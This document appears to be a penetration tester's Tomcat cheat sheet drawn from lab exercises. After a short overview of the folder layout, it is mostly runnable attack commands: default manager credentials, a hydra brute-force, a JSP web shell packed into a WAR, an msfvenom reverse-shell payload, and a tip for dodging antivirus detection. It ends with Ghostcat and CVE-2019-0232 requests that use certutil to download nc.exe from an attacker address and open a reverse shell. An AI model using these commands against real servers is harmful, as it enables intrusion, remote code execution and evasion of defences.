# Tomcat #### General folder structure of a Tomcat installation ```bash ├── bin ├── conf │ ├── catalina.policy │ ├── catalina.properties │ ├── context.xml │ ├── tomcat-users.xml │ ├── tomcat-users.xsd │ └── web.xml ├── lib ├── logs ├── temp ├── webapps │ ├── manager │ │ ├── images │ │ ├── META-INF │ │ └── WEB-INF | | └── web.xml │ └── ROOT │ └── WEB-INF └── work └── Catalina └── localhost ``` The `bin` folder stores scripts and binaries needed to start and run a Tomcat server. The `conf` folder stores various configuration files used by Tomcat. The `tomcat-users.xml` file stores user credentials and their assigned roles. The `lib` folder holds the various JAR files needed for the correct functioning of Tomcat. The `logs` and `temp` folders store temporary log files. The `webapps` folder is the default webroot of Tomcat and hosts all the applications. The `work` folder acts as a cache and is used to store data during runtime. Each folder inside `webapps` is expected to have the following structure. ```bash webapps/customapp ├── images ├── index.jsp ├── META-INF │ └── context.xml ├── status.xsd └── WEB-INF ├── jsp | └── admin.jsp └── web.xml └── lib | └── jdbc_drivers.jar └── classes └── AdminServlet.class ``` he most important file among these is `WEB-INF/web.xml` stores information about the routes used by the application and the classes handling these routes. Any vulnerability in these files can lead to total compromise of the website. {% hint style="info" %} [Jakarta Server Pages (JSP)](https://en.wikipedia.org/wiki/Jakarta_Server_Pages), formerly known as `JavaServer Pages`, which can be compared to PHP files on an Apache server. {% endhint %} ## **Discovery/Footprinting** {% hint style="info" %} The `web.xml` descriptor holds a lot of sensitive information and is an important file to check when leveraging a Local File Inclusion (LFI) vulnerability. {% endhint %} #### Tomcat Version ![https://academy.hackthebox.com/storage/modules/113/tomcat\_invalid.png](https://academy.hackthebox.com/storage/modules/113/tomcat_invalid.png) ```bash #Get tomcat version Intrusionz3r0@htb[/htb]$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat ``` #### **Default Credentials** The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being: * admin:admin * tomcat:tomcat * admin: * admin:s3cr3t * tomcat:s3cr3t * admin:tomcat **Wordlist**: * /usr/share/metasploit-framework/data/wordlists/tomcat\_mgr\_default\_users.txt * /usr/share/metasploit-framework/data/wordlists/tomcat\_mgr\_default\_pass.txt ```bash #Brute force attack Intrusionz3r0@htb[/htb]$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local http-get /manager/html ``` **Bruteforce Script** ## **Tomcat Manager - WAR File Upload** ```bash Intrusionz3r0@htb[/htb]$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp Intrusionz3r0@htb[/htb]$ zip -r backup.war cmd.jsp #Upload the malicious file Intrusionz3r0@htb[/htb]$ curl -s 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=ls' ``` Using MSFVenom to create .war file. (The web shell as is only gets detected by 2/58 anti-virus vendors.) ```bash Intrusionz3r0@htb[/htb]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war ``` A simple change such as changing: ```java FileOutputStream(f);stream.write(m);o="Uploaded: ``` to: ```java FileOutputStream(f);stream.write(m);o="uPlOaDeD: ``` results in 0/58 security vendors flagging the `cmd.jsp` file as malicious at the time of writing. ### **CVE-2020-1938 : Ghostcat** All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable. ```bash Intrusionz3r0@htb[/htb]$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml ``` ## **Apache Tomcat: Important: Remote Code Execution on Windows (CVE-2019-0232)** #### Affected versions * 9.0.0.M1 to 9.0.17 * 8.5.0 to 8.5.39 * 7.0.0 to 7.0.93 ```jsx Intrusionz3r0@htb[/htb]$ fuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.47.188:8080//cgi/FUZZ.bat -t 300 -ic Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&c%3a\Windows\System32\certutil.exe+-urlcache+-split+-f+http%3a//10.10.14.33/nc.exe' Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&nc.exe+-e+cmd.exe+10.10.14.33+1234' ```